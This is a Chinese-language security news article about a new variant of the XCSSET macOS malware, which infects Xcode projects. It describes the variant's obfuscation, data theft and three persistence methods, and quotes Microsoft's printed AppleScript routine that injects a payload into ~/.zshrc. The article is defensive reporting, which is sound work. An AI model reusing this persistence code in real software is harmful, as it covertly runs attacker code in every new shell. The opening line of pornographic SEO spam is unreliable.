自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

新型 XCSSET 惡意軟件利用增強混淆技術(shù)攻擊 macOS 用戶

作者:AI小蜜蜂
安全
新型XCSSET惡意軟件利用增強混淆技術(shù)攻擊macOS用戶,感染Xcode項目,竊取敏感信息,采用復(fù)雜持久化機(jī)制,威脅開發(fā)者安全。

微軟威脅情報團(tuán)隊發(fā)現(xiàn)了一種新型的XCSSET變種,這是一種復(fù)雜的模塊化macOS惡意軟件,能夠感染Xcode項目,并在開發(fā)者構(gòu)建這些項目時執(zhí)行。

這是自2022年以來的首個已知XCSSET變種,采用了增強的混淆方法、更新的持久化機(jī)制以及新的感染策略,旨在竊取macOS用戶的敏感信息。

惡意軟件的感染策略

該惡意軟件的感染策略利用了開發(fā)者在開發(fā)與Apple或macOS相關(guān)的應(yīng)用程序時共享項目文件的方式。新型XCSSET變種采用了模塊化的方式,其有效載荷經(jīng)過深度編碼,并改進(jìn)了錯誤處理機(jī)制。

為了在受感染設(shè)備上保持低調(diào)并盡可能保持無文件狀態(tài),該惡意軟件廣泛使用腳本語言、UNIX命令和合法二進(jìn)制文件,這使得檢測和清除變得極具挑戰(zhàn)性。在代碼層面,惡意軟件對模塊名稱進(jìn)行混淆,以阻礙靜態(tài)分析,并采用隨機(jī)化方法生成有效載荷。

與之前的變種僅依賴xxd(hexdump)進(jìn)行編碼不同,最新版本還引入了Base64編碼技術(shù)。

持久化技術(shù)

該惡意軟件采用了三種不同的持久化技術(shù),確保其有效載荷在以下情況下啟動:新shell會話開始、用戶打開偽造的Launchpad應(yīng)用程序或開發(fā)者在Git中提交更改。

微軟研究人員指出,感染鏈由四個階段組成,首先是構(gòu)建受感染的Xcode項目時運行的混淆shell有效載荷。

混淆的第一階段 shell payload(來源 – Microsoft)

第一階段的有效載荷在被傳輸?shù)?shell 之前,會經(jīng)過多次十六進(jìn)制解碼迭代:

sh -c"(echo  33336363233343633335233303536

在初始感染之后,該惡意軟件會從其命令與控制服務(wù)器(C2)下載額外的模塊,其中包括能夠竊取系統(tǒng)信息、瀏覽器擴(kuò)展數(shù)據(jù)、數(shù)字錢包信息以及來自 “備忘錄” 應(yīng)用程序的筆記內(nèi)容的組件。

該惡意軟件通過幾種復(fù)雜的方法來實現(xiàn)駐留。其中一種方法是修改~/.zshrc 文件,以便在每次啟動新的 shell 會話時執(zhí)行惡意代碼。

.zshrc 駐留方法(來源:微軟)

惡意軟件在利用.zshrc 文件駐留時,會先檢查是否存在恢復(fù)標(biāo)志,然后根據(jù)標(biāo)志決定是刪除惡意文件,還是創(chuàng)建并更新它:

on doMain()
    try
        if RESTORE_DEFAULT is true then
            do shell script "rm -f ~/.zshrc_aliases"
            log ".zshrc_aliases removed"
        else
            set payload to getPayloadBody("Terminal")
            set payload to quoted form of payload
            do shell script "echo " & payload & " > ~/.zshrc_aliases"
            log ".zshrc_aliases updated"
            set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"
            set payload to quoted form of payload
            do shell script "touch ~/.zshrc"
            do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"
            log ".zshrc done"
        end if
    on error the errorMessage
        log "failed at .zshrc: " & errorMessage
        return
    end try
end doMain

另一種駐留手段是創(chuàng)建一個偽裝成啟動臺的惡意應(yīng)用,只要用戶試圖打開真正的啟動臺,這個偽裝應(yīng)用就會執(zhí)行惡意代碼。

此外,惡意軟件還會通過修改 Git 倉庫的預(yù)提交鉤子,在開發(fā)者提交更改時執(zhí)行有效載荷,從而感染 Git 倉庫。

微軟建議用戶及時更新到最新版本的操作系統(tǒng),在使用 Xcode 項目時仔細(xì)檢查,同時啟用微軟端點防護(hù)軟件(Microsoft Defender for Endpoint)等安全防護(hù)工具,這些工具能夠檢測并隔離該惡意軟件變種,有效保護(hù)系統(tǒng)安全。

責(zé)任編輯:趙寧寧 來源: FreeBuf
惡意軟件系統(tǒng)安全網(wǎng)絡(luò)安全
相關(guān)推薦

2025-02-18 15:05:32

2022-04-26 12:17:41

惡意軟件網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)釣魚

2021-02-02 09:12:13

惡意軟件Android網(wǎng)絡(luò)攻擊

2023-07-11 07:43:22

2022-09-14 11:03:26

惡意軟件macOS

2015-03-31 09:23:55

2022-05-05 09:04:33

惡意軟件黑客

2025-03-25 14:39:37

2023-07-27 07:27:11

2011-07-20 09:32:57

2012-07-12 09:10:37

2012-07-12 09:58:49

2022-07-19 16:20:07

惡意軟件釣魚攻擊

2024-08-20 16:51:16

2023-08-30 07:19:49

2024-02-19 08:16:40

2014-12-26 14:35:34

2009-09-02 21:16:40

2024-12-03 15:19:02

2025-03-27 07:00:00

惡意軟件移動安全網(wǎng)絡(luò)安全
點贊
收藏

51CTO技術(shù)棧公眾號